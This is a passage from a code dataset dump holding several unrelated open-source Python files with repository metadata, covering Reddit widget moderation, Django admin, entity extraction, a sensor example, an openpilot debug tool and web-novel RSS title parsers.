styles)
For more information on creation, see :meth:`.add_text_area`.
Update one (requires proper moderator permissions):
.. code-block:: python
new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
text_area = text_area.mod.update(shortName='My fav text',
styles=new_styles)
Delete one (requires proper moderator permissions):
.. code-block:: python
text_area.mod.delete()
**Typical Attributes**
This table describes attributes that typically belong to objects of this
class. Since attributes are dynamically provided (see
:ref:`determine-available-attributes-of-an-object`), there is not a
guarantee that these attributes will always be present, nor is this list
comprehensive in any way.
======================= ===================================================
Attribute Description
======================= ===================================================
``id`` The widget ID.
``kind`` The widget kind (always ``'textarea'``).
``shortName`` The short name of the widget.
``styles`` A ``dict`` with the keys ``'backgroundColor'`` and
``'headerColor'``.
``subreddit`` The :class:`.Subreddit` the button widget belongs
to.
``text`` The widget's text, as Markdown.
``textHtml`` The widget's text, as HTML.
======================= ===================================================
"""
class WidgetEncoder(JSONEncoder):
"""Class to encode widget-related objects."""
def default(self, o): # pylint: disable=E0202
"""Serialize ``PRAWBase`` objects."""
if isinstance(o, PRAWBase):
return {
key: val
for key, val in vars(o).items()
if not key.startswith("_")
}
return JSONEncoder.default(self, o)
class WidgetModeration(object):
"""Class for moderating a particular widget.
Example usage:
.. code-block:: python
widget = reddit.subreddit('my_sub').widgets.sidebar[0]
widget.mod.update(shortName='My new title')
widget.mod.delete()
"""
def __init__(self, widget, subreddit, reddit):
"""Initialize the widget moderation object."""
self.widget = widget
self._reddit = reddit
self._subreddit = subreddit
def delete(self):
"""Delete the widget.
Example usage:
.. code-block:: python
widget.mod.delete()
"""
path = API_PATH["widget_modify"].format(
widget_id=self.widget.id, subreddit=self._subreddit
)
self._reddit.request("DELETE", path)
def update(self, **kwargs):
"""Update the widget. Returns the updated widget.
Parameters differ based on the type of widget. See
`Reddit documentation
<https://www.reddit.com/dev/api#PUT_api_widget_{widget_id}>`_ or the
document of the particular type of widget.
For example, update a text widget like so:
.. code-block:: python
text_widget.mod.update(shortName='New text area', text='Hello!')
.. note::
Most parameters follow the ``lowerCamelCase`` convention. When in
doubt, check the Reddit documentation linked above.
"""
path = API_PATH["widget_modify"].format(
widget_id=self.widget.id, subreddit=self._subreddit
)
payload = {
key: value
for key, value in vars(self.widget).items()
if not key.startswith("_")
}
del payload["subreddit"] # not JSON serializable
payload.update(kwargs)
widget = self._reddit.put(
path, data={"json": dumps(payload, cls=WidgetEncoder)}
)
widget.subreddit = self._subreddit
return widget
| [
"[email protected]"
]
| |
60e99e3c34a04fa47c76b65eeb7e6b16e810f619 | 9ed385053e7f28bfd0c6f186fc4963faac43eb96 | /store/admin.py | 242da77e1948b6798d3a5b94197f9a83ae85741d | []
| no_license | Pagante/greatkart-django | ffadfb5d4827220f3df588fb1d21dc28f1359ce0 | d4bb679c7fd270435f4ce0cc8854bdb3d2e134dd | refs/heads/main | 2023-05-12T01:07:53.092949 | 2021-05-30T16:34:07 | 2021-05-30T16:34:07 | 365,899,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | from django.contrib import admin
from django.db import models
from .models import Product, Variation, reviewRating
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
list_display = ('id', 'product_name','price', 'stock', 'category','modified_date', 'is_available')
prepopulated_fields = {'slug': ('product_name',)}
list_display_links = ('id', 'product_name', 'price', 'stock')
class VariationAdmin(admin.ModelAdmin):
list_display = ('id','product', 'variation_category', 'variation_value' ,'is_active')
list_display_links = ('id','product', 'variation_category', 'variation_value' )
list_editable = ('is_active',)
list_filter = ('product', 'variation_category', 'variation_value' )
admin.site.register(Product, ProductAdmin)
admin.site.register(Variation, VariationAdmin)
admin.site.register(reviewRating) | [
"[email protected]"
]
| |
4095bae2f056ec0ad61e9b477a8afdbf75a69e26 | b9e5aebb49734ad47825130529bd64e59f690ecf | /chapter_3/greeting.py | 78fd31f144aa4c16e330ae31c4398f6ae86f6131 | []
| no_license | mikegirenko/python-learning | dab0f67d990d95035f93720986c84aaf422f7a9f | db9e3f0e3897caf703169d1f14b15a9aa1901161 | refs/heads/master | 2021-07-09T08:03:40.535653 | 2020-08-05T00:13:41 | 2020-08-05T00:13:41 | 169,983,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | my_friends = ['bob', 'dave', 'tom']
print('Hello, my first friend ' + my_friends[0].title())
print('Hello, my second friend ' + my_friends[1].title())
print('Hello, my last friend ' + my_friends[-1].title())
| [
"[email protected]"
]
| |
4bb54211b52f574fa2a23278d051229f519fd3cd | 5a74a3c8e40b902c8a6702a1ca4183770ba64f69 | /onesource/extract_entities.py | bf43c2865d76de6bbebbe6c3fba7028a2c58db52 | []
| no_license | markmo/onesource | 77e6b9234d2408c4f473823195897f9e0e328486 | b3e43dde6b527115035b89cdae0f42f5e4daa441 | refs/heads/master | 2021-04-03T04:44:11.110450 | 2019-05-19T06:12:45 | 2019-05-19T06:12:45 | 125,161,967 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,809 | py | import csv
from datetime import datetime
from dateutil.parser import parse
from duckling import DucklingWrapper
from flair.data import Sentence
from flair.models import SequenceTagger
from flashtext import KeywordProcessor
import json
from logging import Logger
import os
from pathlib import Path
from pipeline import AbstractStep, file_iter, json_output_handler as oh
import re
from typing import Any, AnyStr, Callable, Dict, Iterator, IO, List, Tuple
from utils import convert_name_to_underscore
ENTITY_DATE = 'date'
ENTITY_NUMBER = 'number'
ENTITY_PERSON = 'person'
ENABLED_SYSTEM_ENTITIES = {ENTITY_DATE, ENTITY_NUMBER, ENTITY_PERSON}
class ExtractEntitiesStep(AbstractStep):
"""
Extract entities from collected text.
"""
def __init__(self,
name: str,
source_key: str = None,
overwrite: bool = False,
source_iter: Callable[[List[str]], Iterator[IO[AnyStr]]] = file_iter,
output_handler: Callable[[str, Dict[str, Any]], None] = oh):
super().__init__(name, source_key, overwrite)
self.__source_iter = source_iter
self.__output_handler = output_handler
root_path = Path(__file__).parent.parent
entities_path = str(root_path / 'config/entities.csv')
self.entity_reverse_lookup, synonyms, self.regexprs = load_entities(entities_path)
self.keyword_processor = prepare_keyword_processor(synonyms)
duckling_entities = {ENTITY_DATE, ENTITY_NUMBER}
tagger_entities = {ENTITY_PERSON}
if len(duckling_entities.intersection(ENABLED_SYSTEM_ENTITIES)) > 0:
self.d = DucklingWrapper()
if len(tagger_entities.intersection(ENABLED_SYSTEM_ENTITIES)) > 0:
self.tagger = SequenceTagger.load('ner')
def process_file(self,
file: IO[AnyStr],
path: str,
control_data: Dict[str, Any],
logger: Logger,
accumulator: Dict[str, Any]
) -> None:
logger.debug('process file: {}'.format(file.name))
input_doc = json.load(file)
metadata = input_doc['metadata']
record_id = metadata['record_id']
data = input_doc['data']
text = data['text']
nlp_text = []
for t in text:
entities = []
keywords_found = self.keyword_processor.extract_keywords(t, span_info=True)
for keyword in keywords_found:
entities.append({
'entity': self.entity_reverse_lookup[keyword[0]],
'location': keyword[1:],
'value': keyword[0],
'confidence': 1.0
})
matches = match_regexprs(t, self.regexprs)
for match in matches:
match['entity'] = self.entity_reverse_lookup[match['value']]
entities.extend(matches)
entities.extend(self.match_system_entities(t))
# is the span of an entity contained within the span
# of another entity
def is_contained(entity):
start, end = entity['location']
for ent in entities:
s, e = ent['location']
# exclude exact span matches
if (start == s and end < e) or (start > s and end == e) or (start > s and end < e):
return True
return False
def is_valid(entity):
# remove spurious dates
if entity['entity'] == 'sys-date':
start, end = entity['location']
if (end - start) < 8:
return False
value = entity['value']
if isinstance(value, str):
try:
date = parse(value)
except ValueError:
return False
year = date.year
if year < 1990 or year > 2025:
return False
return True
# keep the entity with the longest span where an entity
# is contained within the span of another
pruned_entities = [ent for ent in entities if not is_contained(ent) and is_valid(ent)]
nlp_text.append({
'text': t,
'entities': pruned_entities
})
now = datetime.utcnow().isoformat()
write_root_dir = control_data['job']['write_root_dir']
step_name = convert_name_to_underscore(self.name)
output_filename = '{}_{}.json'.format(step_name, record_id)
output_path = os.path.join(write_root_dir, step_name, output_filename)
data = {}
data['nlp_text'] = nlp_text
content = {'metadata': metadata, 'data': data}
accumulator['files_output'].append({
'filename': output_filename,
'input': path,
'path': output_path,
'status': 'processed',
'time': now
})
self.__output_handler(output_path, content)
def run(self, control_data: Dict[str, Any], logger: Logger, accumulator: Dict[str, Any]) -> None:
file_paths = [x['path'] for x in control_data[self.source_key]]
step_name = convert_name_to_underscore(self.name)
processed_file_paths = {}
if step_name in control_data:
for x in control_data[step_name]:
if x['status'] == 'processed':
processed_file_paths[x['input']] = x
for file, path in self.__source_iter(file_paths):
if not self._overwrite and path in processed_file_paths.keys():
accumulator['files_output'].append(processed_file_paths[path])
continue
self.process_file(file, path, control_data, logger, accumulator)
def match_system_entities(self, utter):
matches = []
if ENTITY_DATE in ENABLED_SYSTEM_ENTITIES:
results = self.d.parse_time(utter)
for result in results:
matches.append({
'entity': 'sys-date',
'location': [result['start'], result['end']],
'value': result['value']['value'],
'confidence': 1.0
})
if ENTITY_NUMBER in ENABLED_SYSTEM_ENTITIES:
results = self.d.parse_number(utter)
for result in results:
matches.append({
'entity': 'sys-number',
'location': [result['start'], result['end']],
'value': result['value']['value'],
'confidence': 1.0
})
sentence = None
if ENTITY_PERSON in ENABLED_SYSTEM_ENTITIES:
if sentence is None:
sentence = Sentence(utter)
self.tagger.predict(sentence)
for entity in sentence.get_spans('ner'):
if entity.tag == 'PER':
matches.append({
'entity': 'sys-person',
'location': [entity.start_pos, entity.end_pos],
'value': entity.text,
'confidence': entity.score
})
return matches
def load_entities(file_path: str) -> Tuple[Dict[str, str], Dict[str, list], Dict[str, list]]:
entity_reverse_lookup = {}
synonyms = {}
regexprs = {}
with open(file_path, 'r') as f:
reader = csv.reader(f)
for row in reader:
if len(row) > 1: # otherwise entity specification incomplete
row = [x.strip() for x in row] # strip any whitespace around cell values
entity_name = row[0]
entity_value = row[1]
if entity_value != '__sys':
entity_reverse_lookup[entity_value] = entity_name
if len(row) > 2 and row[2].startswith('/'):
# A regular expr
values = re.split(r'/\s*,\s*/', row[2][1:-1]) # strip start and end '/.../' markers
regexprs[entity_value] = values
else:
# A synonym
values = [entity_value, *re.split(r'\s*,\s*', row[2])] # include the entity_value
synonyms[entity_value] = values
return entity_reverse_lookup, synonyms, regexprs
def match_regexprs(utter: str, regexprs: Dict[str, list]) -> List[Dict[str, Any]]:
matches = []
for entity_value, exprs in regexprs.items():
for expr in exprs:
for match in re.finditer(expr, utter):
groups = [{
'group': 'group_0',
'location': list(match.span())
}]
for i, g in enumerate(match.groups()):
groups.append({
'group': 'group_{}'.format(i + 1),
'location': list(match.span(i + 1))
})
entity = {
'location': list(match.span()),
'value': entity_value,
'confidence': 1.0,
'groups': groups
}
matches.append(entity)
return matches
def prepare_keyword_processor(synonyms: Dict[str, list]) -> KeywordProcessor:
"""
28x faster than a compiled regexp for 1,000 keywords
https://github.com/vi3k6i5/flashtext
:param synonyms: dict of entity synonyms
:return:
"""
kp = KeywordProcessor(case_sensitive=True)
kp.add_keywords_from_dict(synonyms)
return kp
| [
"[email protected]"
]
| |
2670eb26885abb954a926b8bbdf67cab549a0831 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/74A/cdf_74A.py | e07ce0c876f071bb2b46f0dfd4a3368160518a56 | [
"MIT"
]
| permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from operator import itemgetter
class CodeforcesTask74ASolution:
def __init__(self):
self.result = ''
self.n = 0
self.participants = []
def read_input(self):
self.n = int(input())
for x in range(self.n):
self.participants.append(input().split(" "))
def process_task(self):
scores = []
for part in self.participants:
score = 0
score += int(part[1]) * 100
score -= int(part[2]) * 50
score += sum([int(x) for x in part[2:]])
scores.append((part[0], score))
scores.sort(reverse=True, key=itemgetter(1))
self.result = scores[0][0]
def get_result(self):
return self.result
if __name__ == "__main__":
Solution = CodeforcesTask74ASolution()
Solution.read_input()
Solution.process_task()
print(Solution.get_result())
| [
"[email protected]"
]
| |
aed45e56c7dc367acf8f001535bbe48a7d4e1b21 | 6841f44b102572978b67af7b9fba9db03f75a6c3 | /cravattdb/contrib/residue_number_annotation/__init__.py | d74359f210fd5f30cb7a1134f916ebcb18581c7f | []
| no_license | radusuciu/cravattdb | 69fae8c30a94774420024ad4b90c285bc9c2c64c | bc4b2a147a374eed2e9350e824df85ba2108fca9 | refs/heads/master | 2021-06-06T08:29:41.824284 | 2016-10-21T21:57:13 | 2016-10-21T21:57:13 | 65,228,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | """Blergh."""
from cravattdb.contrib.residue_number_annotation import uniprot
from urllib.parse import urlparse
from functools import partial
import ftplib
import pathlib
import gzip
SWISSPROT_URL = urlparse(
'ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/taxonomic_divisions/uniprot_sprot_human.dat.gz'
)
ABS_PATH = pathlib.Path(__file__).parents[0]
SWISSPROT_DAT = pathlib.Path(ABS_PATH, 'data/uniprot_sprot_human.dat')
DATA_PATH = pathlib.Path(ABS_PATH, 'data/uniprot.json')
def get_residue_number(experiment_type):
if experiment_type == 'isotop':
return partial(_get_residue_number, db=get_db())
else:
return None
def _get_residue_number(uniprot_id, peptide, db=None):
"""Return residue number for labeled cysteine in a given protein."""
residue = None
if not db:
db = get_db()
try:
residue = uniprot.get_residue_number(db, uniprot_id, peptide)
except:
pass
finally:
return residue
def get_db():
"""Get a handle to uniprot db, downloading if necessary."""
if not DATA_PATH.exists() and not SWISSPROT_DAT.exists():
download_database()
db = uniprot.init(
data_path=str(DATA_PATH),
input_data_path=str(SWISSPROT_DAT)
)
cleanup_database_files()
return db
def download_database():
# heard you like context managers
db_path = pathlib.Path(SWISSPROT_URL.path)
archive_path = pathlib.Path('data', db_path.name)
with ftplib.FTP(SWISSPROT_URL.netloc) as ftp:
ftp.login()
ftp.cwd(str(db_path.parent))
retr_command = 'RETR {}'.format(str(db_path.name))
ftp.retrbinary(retr_command, open(str(archive_path), 'wb').write)
with gzip.open(str(archive_path), 'r') as z:
with open(str(SWISSPROT_DAT), 'wb') as f:
f.writelines(z)
def cleanup_database_files():
"""If there are any giant downloaded files, delete them."""
pass
| [
"[email protected]"
]
| |
7dedc777e0e8c11ea0c28aa6c6a08bd4e0d6cf3f | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/bno08x_simpletest.py | 7be292ef80153375b4ff5a7b2baf3d3e200f97f0 | []
| no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | # SPDX-FileCopyrightText: 2020 Bryan Siepert, written for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import time
import board
import busio
from adafruit_bno08x import (
BNO_REPORT_ACCELEROMETER,
BNO_REPORT_GYROSCOPE,
BNO_REPORT_MAGNETOMETER,
BNO_REPORT_ROTATION_VECTOR,
)
from adafruit_bno08x.i2c import BNO08X_I2C
i2c = busio.I2C(board.SCL, board.SDA, frequency=800000)
bno = BNO08X_I2C(i2c)
bno.enable_feature(BNO_REPORT_ACCELEROMETER)
bno.enable_feature(BNO_REPORT_GYROSCOPE)
bno.enable_feature(BNO_REPORT_MAGNETOMETER)
bno.enable_feature(BNO_REPORT_ROTATION_VECTOR)
while True:
time.sleep(0.5)
print("Acceleration:")
accel_x, accel_y, accel_z = bno.acceleration # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f m/s^2" % (accel_x, accel_y, accel_z))
print("")
print("Gyro:")
gyro_x, gyro_y, gyro_z = bno.gyro # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f rads/s" % (gyro_x, gyro_y, gyro_z))
print("")
print("Magnetometer:")
mag_x, mag_y, mag_z = bno.magnetic # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f uT" % (mag_x, mag_y, mag_z))
print("")
print("Rotation Vector Quaternion:")
quat_i, quat_j, quat_k, quat_real = bno.quaternion # pylint:disable=no-member
print(
"I: %0.6f J: %0.6f K: %0.6f Real: %0.6f" % (quat_i, quat_j, quat_k, quat_real)
)
print("")
| [
"[email protected]"
]
| |
95fcf4a17f0202eed8705013ffc615e1f1de0c74 | 7ef01829aca4b92687780d45745f62ca33480bc1 | /selfdrive/debug/dump.py | 89dd43fa4ce002a291378926b2c0b45a34ec58a6 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | Jamezz/openpilot | 25392231ff229dc3dd360fa6bf782326d962496f | 5272c6b18e56a7124a56d2c2f6d8a7d7b2d4ac10 | refs/heads/volt | 2020-03-08T06:59:47.872585 | 2018-03-27T04:40:15 | 2018-03-27T04:40:15 | 127,984,350 | 0 | 0 | MIT | 2018-05-15T15:02:00 | 2018-04-04T00:25:52 | C | UTF-8 | Python | false | false | 2,576 | py | #!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
context = zmq.Context()
poller = zmq.Poller()
parser = argparse.ArgumentParser(description='Sniff a communcation socket')
parser.add_argument('--pipe', action='store_true')
parser.add_argument('--raw', action='store_true')
parser.add_argument('--json', action='store_true')
parser.add_argument('--dump-json', action='store_true')
parser.add_argument('--no-print', action='store_true')
parser.add_argument('--proxy', action='store_true', help='republish on localhost')
parser.add_argument('--map', action='store_true')
parser.add_argument('--addr', default='127.0.0.1')
parser.add_argument("socket", type=str, nargs='*', help="socket name")
args = parser.parse_args()
republish_socks = {}
for m in args.socket if len(args.socket) > 0 else service_list:
if m in service_list:
port = service_list[m].port
elif m.isdigit():
port = int(m)
else:
print("service not found")
exit(-1)
sock = messaging.sub_sock(context, port, poller, addr=args.addr)
if args.proxy:
republish_socks[sock] = messaging.pub_sock(context, port)
if args.map:
from flask.ext.socketio import SocketIO
from flask import Flask
app = Flask(__name__)
socketio = SocketIO(app, async_mode='threading')
server_thread = Thread(target=run_server, args=(socketio,))
server_thread.daemon = True
server_thread.start()
print 'server running'
while 1:
polld = poller.poll(timeout=1000)
for sock, mode in polld:
if mode != zmq.POLLIN:
continue
msg = sock.recv()
evt = log.Event.from_bytes(msg)
if sock in republish_socks:
republish_socks[sock].send(msg)
if args.map and evt.which() == 'liveLocation':
print 'send loc'
socketio.emit('location', {
'lat': evt.liveLocation.lat,
'lon': evt.liveLocation.lon,
'alt': evt.liveLocation.alt,
})
if not args.no_print:
if args.pipe:
sys.stdout.write(msg)
sys.stdout.flush()
elif args.raw:
hexdump(msg)
elif args.json:
print(json.loads(msg))
elif args.dump_json:
print json.dumps(evt.to_dict())
else:
print evt
| [
"[email protected]"
]
| |
316e6ad857cdf28a96fb109dab5fd55ee601abab | f20516958c39123f204e2bc442c91df7df1cc34a | /WebMirror/OutputFilters/rss/ParserFuncs_o_u.py | c43a9dddcb91153d5e3e615a7e44a15e4cb188a3 | [
"BSD-3-Clause"
]
| permissive | bradparks/ReadableWebProxy | 3c2732cff64007afa8318b5b159616a529068322 | 81fbce3083471126942d2e2a298dba9eaf1092b1 | refs/heads/master | 2020-05-29T11:48:40.189530 | 2016-08-25T15:17:14 | 2016-08-25T15:17:14 | 66,568,996 | 0 | 0 | null | 2016-08-25T15:13:39 | 2016-08-25T15:13:39 | null | UTF-8 | Python | false | false | 138,569 | py |
# pylint: disable=C0112,R0911,R0912,W0612
from WebMirror.OutputFilters.util.MessageConstructors import buildReleaseMessage
from WebMirror.OutputFilters.util.TitleParsers import extractChapterVol
from WebMirror.OutputFilters.util.TitleParsers import extractChapterVolFragment
from WebMirror.OutputFilters.util.TitleParsers import extractVolChapterFragmentPostfix
import re
####################################################################################################################################################
def extractSousetsuka(item):
'''
# Sousetsuka
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Desumachi' in item['tags'] or 'Death March kara Hajimaru Isekai Kyousoukyoku' in item['title']:
extract = re.search(r'Kyousoukyoku (\d+)\-(\d+)', item['title'])
if extract and not vol:
vol = int(extract.group(1))
chp = int(extract.group(2))
return buildReleaseMessage(item, "Death March kara Hajimaru Isekai Kyousoukyoku", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractSpiritGodShura(item):
'''
# Sousetsuka
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if item['title'].startswith("Chapter") and item['tags'] == ['Chapters']:
if ":" in item['title'] and not postfix:
postfix = item['title'].split(":")[-1]
return buildReleaseMessage(item, 'Spirit God Shura', vol, chp, postfix=postfix, tl_type='oel')
return False
####################################################################################################################################################
def extractOniichanyamete(item):
'''
お兄ちゃん、やめてぇ! / Onii-chan Yamete
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Jashin Average' in item['title'] \
or 'Cthulhu Average' in item['title'] \
or 'Evil God Average' in item['tags'] \
or 'jashin' in item['tags']:
return buildReleaseMessage(item, 'Evil God Average', vol, chp, frag=frag, postfix=postfix)
if 'Haunted' in item['tags']:
return buildReleaseMessage(item, 'Haunted Duke’s Daughter', vol, chp, postfix=postfix)
if 'Tilea’s Worries' in item['title']:
return buildReleaseMessage(item, 'Tilea\'s Worries', vol, chp, postfix=postfix)
if 'Tilea' in item['tags'] and 'Raid on the Capital' in item['title'] and not vol:
return buildReleaseMessage(item, 'Tilea\'s Worries', 2, chp, postfix=postfix)
if 'Tilea' in item['tags'] and 'Turf War' in item['title'] and not vol:
return buildReleaseMessage(item, 'Tilea\'s Worries', 3, chp, postfix=postfix)
if 'Kenkyo Kenjitu' in item['tags'] or 'Reika-sama' in item['title']:
return buildReleaseMessage(item, 'Kenkyo Kenjitu', vol, chp, postfix=postfix)
if 'My Sister the Heroine and I the Villainess' in item['tags']:
return buildReleaseMessage(item, 'My Sister the Heroine, and I the Villainess', vol, chp, postfix=postfix)
if 'Vampire Nap' in item['tags']:
return buildReleaseMessage(item, 'The Reincarnated Vampire Wants an Afternoon Nap', vol, chp, postfix=postfix)
if 'The Bathroom Goddess' in item['tags']:
return buildReleaseMessage(item, 'The Bathroom Goddess', vol, chp, postfix=postfix)
if 'a wild boss appeared' in item['tags']:
return buildReleaseMessage(item, 'A Wild Boss Appeared', vol, chp, postfix=postfix)
if 'The Girl Who Bore the Flame Ring' in item['tags']:
return buildReleaseMessage(item, 'The Girl Who Bore the Flame Ring', vol, chp, postfix=postfix)
if 'Debt Girl' in item['tags']:
return buildReleaseMessage(item, 'The Noble Girl Living in Debt', vol, chp, postfix=postfix)
if 'I’m Back in the Other World' in item['title']:
return buildReleaseMessage(item, 'I\'m Back in the Other World', vol, chp)
if 'Kazuha Axeplant’s Third Adventure:' in item['title']:
return buildReleaseMessage(item, 'Kazuha Axeplant\'s Third Adventure', vol, chp)
if "I'm the Final Boss!?" in item['tags']:
return buildReleaseMessage(item, "I'm the Final Boss!?", vol, chp, tl_type='oel')
if 'Tiger Story' in item['tags']:
return buildReleaseMessage(item, "Tiger Story", vol, chp, tl_type='oel')
elif 'otoburi' in item['tags'] or 'Otoburi' in item['tags']:
# Arrrgh, the volume/chapter structure for this series is a disaster!
# I resent having to do this....
volume_lut = {
# Child Chapter
"3 years old" : 1,
"5 years old" : 1,
"6 years old" : 1,
"7 years old" : 1,
"12 years old" : 1,
"14 years old" : 1,
"15 years old" : 1,
"16 years old" : 1,
# Academy Chapter (First Year First Semester)
"School Entrance Ceremony" : 2,
"First Year First Semester" : 2,
"1st Year 1st Semester" : 2,
# Academy Chapter (Summer Vacation)
"Summer Vacation" : 3,
"Summer Vacation 2nd Half" : 3,
"Summer Vacation Last" : 3,
# Academy Chapter (First Year Second Semester)
"First Year Second Semester" : 4,
# Job Chapter
"Recuperating?" : 5,
"Wedding Preparations?" : 5,
"Newlywed Life" : 5,
# Major Cleanup Chapter
"Cleanup" : 6,
"My Lord’s Engagement" : 6,
"The Winter is Almost Here" : 6,
"Experiments and Preparations" : 6,
"Engagement Party" : 6,
# Dilemma Chapter
"In the Middle of a Fight?" : 7,
"In the Middle of Reflecting" : 7,
}
for chp_key in volume_lut.keys():
if chp_key.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Otome Game no Burikko Akuyaku Onna wa Mahou Otaku ni Natta', volume_lut[chp_key], chp)
# else:
# # self.log.warning("Cannot decode item:")
# # self.log.warning("%s", item['title'])
# # self.log.warning("Cannot decode item: '%s'", item['title'])
return False
####################################################################################################################################################
def extractTheLazy9(item):
'''
# TheLazy9
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'かんすとっぷ!(KANSUTOPPU)' in item['tags'] or "Kansutoppu!" in item['title']:
return buildReleaseMessage(item, "Kansutoppu!", vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith("Manowa"):
return buildReleaseMessage(item, "Manowa Mamono Taosu Nouryoku Ubau Watashi Tsuyokunaru", vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith("Cat "):
return buildReleaseMessage(item, "Me and My Beloved Cat (Girlfriend)", vol, chp, frag=frag, postfix=postfix)
if 'Goblin Tenseiki ~erufu youjo ni kaku de maketeru yuusha na ore~' in item['tags']:
return buildReleaseMessage(item, 'Goblin Tenseiki ~erufu youjo ni kaku de maketeru yuusha na ore~', vol, chp, frag=frag, postfix=postfix)
if "Black Knight" in item['title']:
return buildReleaseMessage(item, "The Black Knight Who Was Stronger than even the Hero", vol, chp, frag=frag, postfix=postfix)
if "Astarte’s Knight" in item['title']:
return buildReleaseMessage(item, "Astarte's Knight", vol, chp, frag=frag, postfix=postfix)
if "HTG:" in item['title']:
return buildReleaseMessage(item, "Tozoku shoujo ni tensei shita ore no shimei wa yuusha to maou ni iyagarasena no!", vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractPikaTranslations(item):
'''
# Pika Translations
'''
chp, vol = extractChapterVol(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Close Combat Mage' in item['tags'] or \
'CCM Chapter' in item['title'] or \
'Close Combat Mage Chapter' in item['title']:
return buildReleaseMessage(item, 'Close Combat Mage', vol, chp)
if 'IoR Book' in item['title'] or \
'IoR B' in item['title'] or \
'Inch of Radiance Book' in item['title'] or \
'Inch of Radiance Chapter' in item['title']:
return buildReleaseMessage(item, 'Inch of Radiance', vol, chp)
if 'World of Immortals Chapter' in item['title']:
return buildReleaseMessage(item, 'World of Immortals', vol, chp)
if 'Perfect World Chapter' in item['title'] or \
'PW Chapter' in item['title']:
return buildReleaseMessage(item, 'Perfect World', vol, chp)
return False
####################################################################################################################################################
def extractShinTranslations(item):
'''
# Shin Translations
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if 'THE NEW GATE' in item['tags'] and not 'Status Update' in item['tags']:
if chp and vol and frag:
return buildReleaseMessage(item, 'The New Gate', vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractScryaTranslations(item):
'''
# Scrya Translations
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if "So What if It's an RPG World!?" in item['tags']:
return buildReleaseMessage(item, "So What if It's an RPG World!?", vol, chp, frag=frag)
if 'My Disciple Died Yet Again' in item['tags']:
return buildReleaseMessage(item, 'My Disciple Died Yet Again', vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractSkythewood(item):
'''
# Skythewood translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Altina the Sword Princess' in item['tags']:
return buildReleaseMessage(item, 'Haken no Kouki Altina', vol, chp, frag=frag)
if 'Overlord' in item['tags']:
# Lots of idiot-checking here, because there are a
# bunch of annoying edge-cases I want to work around.
# This will PROBABLY BREAK IN THE FUTURE!
if "Drama CD" in item['title'] or \
"Track" in item['title'] or \
not "Volume" in item['title']:
return None
return buildReleaseMessage(item, 'Overlord', vol, chp, frag=frag, postfix=postfix)
if 'Gifting the wonderful world' in item['tags']:
return buildReleaseMessage(item, 'Gifting the Wonderful World with Blessings!', vol, chp, frag=frag)
if "Knight's & Magic" in item['tags']:
return buildReleaseMessage(item, 'Knight\'s & Magic', vol, chp, frag=frag)
if "Gate" in item['tags']:
return buildReleaseMessage(item, 'Gate - Thus the JSDF Fought There!', vol, chp, frag=frag)
if 'Genocide Reality' in item['tags']:
return buildReleaseMessage(item, 'Genocide Reality', vol, chp, frag=frag)
if 'Youjo Senki' in item['tags']:
return buildReleaseMessage(item, 'Youjo Senki', vol, chp, frag=frag)
if 'Gifting' in item['tags']:
return buildReleaseMessage(item, 'Gifting the wonderful world with blessings!', vol, chp, frag=frag)
if 'Manu' in item['tags']:
return buildReleaseMessage(item, 'Manuscript Screening Boy and Manuscript Submitting Girl', vol, chp, frag=frag)
if 'Isekai Mahou' in item['tags']:
return buildReleaseMessage(item, 'Isekai Mahou wa Okureteru!', vol, chp, frag=frag)
